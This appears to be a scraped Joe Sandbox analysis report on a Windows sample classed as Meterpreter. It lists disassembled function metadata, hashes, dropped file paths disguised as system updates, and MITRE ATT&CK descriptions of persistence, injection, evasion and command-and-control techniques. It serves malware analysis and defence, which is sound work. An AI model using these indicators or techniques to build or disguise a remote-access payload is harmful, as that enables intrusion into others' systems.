Opcode Fuzzy Hash: 3f76d3b8eb91cbaab5872e0bdae80496e65db91be6cba9d8e2bcf6808cea8f07
Instruction Fuzzy Hash: BAF04F56819E8482D202AF18A4000EAB330FB9E788F585325EB8D2A555DF29F5829710

Function 00007FF75F8BEA28 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF75F8BEA70

Strings

Argument singularity (SIGN), xrefs: 00007FF75F8BEA28
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF75F8BEA57

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: ceb1d10968b56ae12f8218274e2f7060f081a16a0fddc52b9ca8b7d4aad8434f
Instruction ID: 23cbdb4a43b005e67801f88f668e08e5a27867143faba21f120c34786d7bfb46
Opcode Fuzzy Hash: ceb1d10968b56ae12f8218274e2f7060f081a16a0fddc52b9ca8b7d4aad8434f
Instruction Fuzzy Hash: A0F06D52819F8882D202AF18A4000ABB330FB8E789F589326EFCD2A515DF29E5828710

Function 00007FF75F8CBAC0 Relevance: 5.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF75F8CBB07
LeaveCriticalSection.KERNEL32 ref: 00007FF75F8CBBB0

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: ca91c7dbbf9fbdf0c5d4d1ce98c90f55577ddd39ed406988b4c5d7c94ea76e82
Instruction ID: b74ac3a0d2c3ed053a3c74402614508d6c37166e0571184894cd65300d53a842
Opcode Fuzzy Hash: ca91c7dbbf9fbdf0c5d4d1ce98c90f55577ddd39ed406988b4c5d7c94ea76e82
Instruction Fuzzy Hash: 0331BC62E08B8686EB549F35D8002E86354FF41B59F9C8331DD1D5E298EF3DE492D310

Function 00007FF75F8CBC10 Relevance: 5.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF75F8CBC57
LeaveCriticalSection.KERNEL32 ref: 00007FF75F8CBCDB

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: f6575ff4926492822f6dd9a617c15dbf444f12e99157ee217c3459317f1afd58
Instruction ID: 0f0eb43351564cc44e9f6b6a3b97eb67636bc7459d652adb64743012433f1664
Opcode Fuzzy Hash: f6575ff4926492822f6dd9a617c15dbf444f12e99157ee217c3459317f1afd58
Instruction Fuzzy Hash: F2217773B08B4586E7549F25D4003F9A394EB44BA8F9C4231DE198F384DF38E995D760

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report sNifdpWiY9.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Meterpreter

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\antietat[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\google[1].bin

C:\Users\user\AppData\Roaming\SystemCache\google.bin

C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
sNifdpWiY9.exe

Function 00007FF75F8B1703 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 178
networkCOMMON

Function 00007FF75F8B11E7 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 101
stringCOMMON

Function 00007FF75F944440 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103
COMMON

Function 00007FF75F8B14BE Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Function 00007FF75F8CDDB4 Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 239
COMMON

Function 00007FF75F8CD620 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 113
threadlibraryloaderCOMMON

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.
Tactics:	Impact
Data Sources:	Cloud Storage: Cloud Storage Modification, Command: Command Execution, File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre